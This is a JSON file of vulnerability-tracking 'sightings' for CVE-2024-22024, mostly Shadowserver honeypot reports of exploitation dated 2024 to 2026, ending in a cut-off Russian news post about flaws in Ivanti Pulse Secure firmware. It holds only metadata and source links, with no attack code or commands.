{"vulnerability": "CVE-2024-22024", "sightings": [{"uuid": "2735f155-e1c8-4558-ac0c-f0a970a0b7d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "MISP/b832113b-e603-406a-ba62-aae9ba13b1b4", "content": "", "creation_timestamp": "2024-03-18T15:46:58.000000Z"}, {"uuid": "8e92f231-4362-4e30-93a5-b310df1d4775", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-03)", "content": "", "creation_timestamp": "2025-02-03T00:00:00.000000Z"}, {"uuid": "c87a01a1-2698-4405-8df5-9d26222ce3cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-30)", "content": "", "creation_timestamp": "2025-01-30T00:00:00.000000Z"}, {"uuid": "a91dae22-255a-4734-b25b-a08411be5ed3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "5b50ff9f-995c-421b-a6ae-12fb290e25a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-24)", "content": "", "creation_timestamp": "2025-01-24T00:00:00.000000Z"}, {"uuid": "34bb5a1e-e24b-49df-996c-b54fe54d333a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "09a83827-246c-4c40-8cad-200bc0dd79a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-23)", "content": "", "creation_timestamp": "2025-01-23T00:00:00.000000Z"}, {"uuid": "6ea9270b-09fd-4531-8560-3ad9a61a42e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-19)", "content": "", "creation_timestamp": "2025-01-19T00:00:00.000000Z"}, {"uuid": "e84bf727-6723-4c73-9f7e-262f5465195b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-18)", "content": "", "creation_timestamp": "2025-01-18T00:00:00.000000Z"}, {"uuid": "997890f1-98c6-441e-9259-3247a63f8430", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-20)", "content": "", "creation_timestamp": "2025-01-20T00:00:00.000000Z"}, {"uuid": "8d79b62d-6397-4761-869e-054940b6ab57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-21)", "content": "", "creation_timestamp": "2025-01-21T00:00:00.000000Z"}, {"uuid": "55244fa2-b5a8-487c-bab0-307fe8b799d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-17)", "content": "", "creation_timestamp": "2025-01-17T00:00:00.000000Z"}, {"uuid": "bcb0b082-1bb1-481d-9f4f-eed7f1dbc679", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "4817a08e-cb07-4610-91b6-002bc282fedd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-22)", "content": "", "creation_timestamp": "2025-01-22T00:00:00.000000Z"}, {"uuid": "ff2a93b3-d23e-4525-88d4-6d28fa26a8bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-26)", "content": "", "creation_timestamp": "2024-12-26T00:00:00.000000Z"}, {"uuid": "c17d05f5-492f-4fd8-a65c-2f153dbdc4e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-02)", "content": "", "creation_timestamp": "2025-02-02T00:00:00.000000Z"}, {"uuid": "63db2c65-20cf-4a4f-b778-9478da4b94f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-09)", "content": "", "creation_timestamp": "2025-01-09T00:00:00.000000Z"}, {"uuid": "cee7abae-e5d2-4646-869c-430ae1b3d93c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-31)", "content": "", "creation_timestamp": "2025-01-31T00:00:00.000000Z"}, {"uuid": "d94c5607-3591-4b49-b986-3fe6fbf8f2c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-10-31)", "content": "", "creation_timestamp": "2024-10-31T00:00:00.000000Z"}, {"uuid": "dcbbe628-b8b6-4c48-b55e-48768ea84461", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "cb784b5a-94e6-4d4b-ad08-47dbf179ecc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-06)", "content": "", "creation_timestamp": "2024-11-06T00:00:00.000000Z"}, {"uuid": "7eecb35a-e9b1-45a8-8064-8fefe86fef8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-15)", "content": "", "creation_timestamp": "2024-11-15T00:00:00.000000Z"}, {"uuid": "6b55011f-d645-42ea-90e2-b78e0dcacb04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-09)", "content": "", "creation_timestamp": "2024-11-09T00:00:00.000000Z"}, {"uuid": "ff62ac85-921b-484b-a347-a57d2dd2735b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-17)", "content": "", "creation_timestamp": "2024-11-17T00:00:00.000000Z"}, {"uuid": "c6cd9500-98fc-4fbf-9ea6-ffc1a4ae8a0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-23)", "content": "", "creation_timestamp": "2024-11-23T00:00:00.000000Z"}, {"uuid": "5e8150a6-fa91-4077-a00d-5e6668d6947b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-25)", "content": "", "creation_timestamp": "2025-01-25T00:00:00.000000Z"}, {"uuid": "3fd9e517-e0e3-403f-968e-5e90451f3422", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-11-25)", "content": "", "creation_timestamp": "2024-11-25T00:00:00.000000Z"}, {"uuid": "7961f67d-ac68-4f20-972f-2fdfd22fc862", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-11)", "content": "", "creation_timestamp": "2024-12-11T00:00:00.000000Z"}, {"uuid": "e5ea17fe-22b2-4348-890b-a2bc339dfed1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-15)", "content": "", "creation_timestamp": "2024-12-15T00:00:00.000000Z"}, {"uuid": "c8329593-f14d-41e1-bcd3-0b6c8d5d3085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "9b93ea62-38ef-42af-bb4f-75a4fbd6bdb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2024-12-20)", "content": "", "creation_timestamp": "2024-12-20T00:00:00.000000Z"}, {"uuid": "5f7b5cc8-5190-4e01-bdee-b4c228a321c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-06)", "content": "", "creation_timestamp": "2025-02-06T00:00:00.000000Z"}, {"uuid": "a8868c53-774f-47e4-90aa-ff8ace41bdfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "f1de20ce-8146-4b86-a331-91dadd361c4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "6bfc19c2-ab98-4bf1-93bb-00145640ade6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "b172bcfc-3ae6-4d50-82aa-5ee5eb6a58be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "68a07d0b-e635-4865-aa40-4a3d27597870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-04)", "content": "", "creation_timestamp": "2025-02-04T00:00:00.000000Z"}, {"uuid": "bafef177-75a7-4f18-95a5-87c63f691a53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-07)", "content": "", "creation_timestamp": "2025-02-07T00:00:00.000000Z"}, {"uuid": "71720a83-dd33-483d-aabc-047d513fa4fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-08)", "content": "", "creation_timestamp": "2025-02-08T00:00:00.000000Z"}, {"uuid": "c4c29f8c-48c8-4a3f-b8f8-95af1dc29ab0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "6de1467a-4c9a-4a8d-ac82-8b54dc88a3ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "a86bcc73-fb9a-4ccd-85ac-c85a41dc078d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-10)", "content": "", "creation_timestamp": "2025-02-10T00:00:00.000000Z"}, {"uuid": "01b5cce8-e788-4372-be2a-7363f1fdd657", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-11)", "content": "", "creation_timestamp": "2025-02-11T00:00:00.000000Z"}, {"uuid": "d08c46de-5073-41ff-80e7-299e7efcdca7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "81ff9911-6ac2-4a83-baf8-0dd5cdb4ab00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "0ef4bf92-2a62-42d9-888c-b0f76e74491b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-22)", "content": "", "creation_timestamp": "2025-02-22T00:00:00.000000Z"}, {"uuid": "2eb268e5-45fe-4124-97f1-509a68cea38a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-24)", "content": "", "creation_timestamp": "2025-02-24T00:00:00.000000Z"}, {"uuid": "1fde47f8-3e36-4cc2-97f2-a02af0097b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-24)", "content": "", "creation_timestamp": "2025-03-24T00:00:00.000000Z"}, {"uuid": "f49e59c6-5aa5-4cd5-a4c6-99dd2361a359", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-15)", "content": "", "creation_timestamp": "2025-05-15T00:00:00.000000Z"}, {"uuid": "627d8df7-beaa-4229-b23d-4c868f436181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-19)", "content": "", "creation_timestamp": "2025-06-19T00:00:00.000000Z"}, {"uuid": "9f1472c1-ac34-4d93-bcbe-313de91e50b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-15)", "content": "", "creation_timestamp": "2025-04-15T00:00:00.000000Z"}, {"uuid": "68a5f76c-cabd-4cb1-9007-738f41877fcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-17)", "content": "", "creation_timestamp": "2025-06-17T00:00:00.000000Z"}, {"uuid": "15a601a5-e83e-401a-88e1-d7d3fa76df30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-16)", "content": "", "creation_timestamp": "2025-06-16T00:00:00.000000Z"}, {"uuid": "62b210a9-9506-4233-a2aa-658a9001801c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-28)", "content": "", "creation_timestamp": "2025-04-28T00:00:00.000000Z"}, {"uuid": "1c40badb-2424-4c6b-bdfb-56ca2832039b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-09)", "content": "", "creation_timestamp": "2025-05-09T00:00:00.000000Z"}, {"uuid": "84d09be5-0779-4d2f-8a95-96120b36a445", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-23)", "content": "", "creation_timestamp": "2025-06-23T00:00:00.000000Z"}, {"uuid": "0d8edd44-d943-43ae-af28-900406af1efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "8b29d04a-4341-4426-822f-3df9f8d400cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "29b9db72-5c61-4da8-ae3f-808d1e62998c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://gist.github.com/Hamid-K/f4288dae3a1f2dea8905b1cf16d59c1b", "content": "", "creation_timestamp": "2025-10-03T16:37:38.000000Z"}, {"uuid": "3bf217bd-ddf3-4922-bdf2-20d2d19f3411", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-05)", "content": "", "creation_timestamp": "2025-09-05T00:00:00.000000Z"}, {"uuid": "17487188-f4ae-465e-a54d-c7cd208ec6c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-20)", "content": "", "creation_timestamp": "2025-05-20T00:00:00.000000Z"}, {"uuid": "b87b6c30-b95b-49f7-93f2-e382ddbaa4d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "1c5282c9-2eea-4150-87aa-9efd58017815", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-09-29)", "content": "", "creation_timestamp": "2025-09-29T00:00:00.000000Z"}, {"uuid": "60065219-2dad-4d21-8b81-af05273d9a4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-11)", "content": "", "creation_timestamp": "2026-01-11T00:00:00.000000Z"}, {"uuid": "313f5709-0679-4d53-bfbf-dee84d5cf9da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_2/2024", "content": "", "creation_timestamp": "2024-01-10T20:21:17.000000Z"}, {"uuid": "2dd56859-d69e-49ea-bdb9-31b2fd821951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-22024", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1226", "content": "", "creation_timestamp": "2024-02-09T04:00:00.000000Z"}, {"uuid": "b6554efd-c5ed-45de-9de3-69dce3e1a5e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-22024", "type": "exploited", "source": "https://t.me/itsec_news/4122", "content": "\u200b\u26a1\ufe0f1200 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0438 5000 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439: Ivanti, \u043f\u043e\u0440\u0430 \u043d\u0430 \u043f\u0435\u043d\u0441\u0438\u044e\n\n\ud83d\udcac \u041d\u0435\u0434\u0430\u0432\u043d\u0435\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 Pulse Secure \u043e\u0442 Ivanti \u043f\u0440\u043e\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u0432\u0435\u0442 \u043d\u0430 \u0433\u043b\u0443\u0431\u043e\u043a\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0430\u0445 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f. \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Eclypsium \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u0432\u0441\u044e \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0437\u0430\u0449\u0438\u0442\u044b \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\u0412 \u0445\u043e\u0434\u0435 \u0441\u0432\u043e\u0435\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 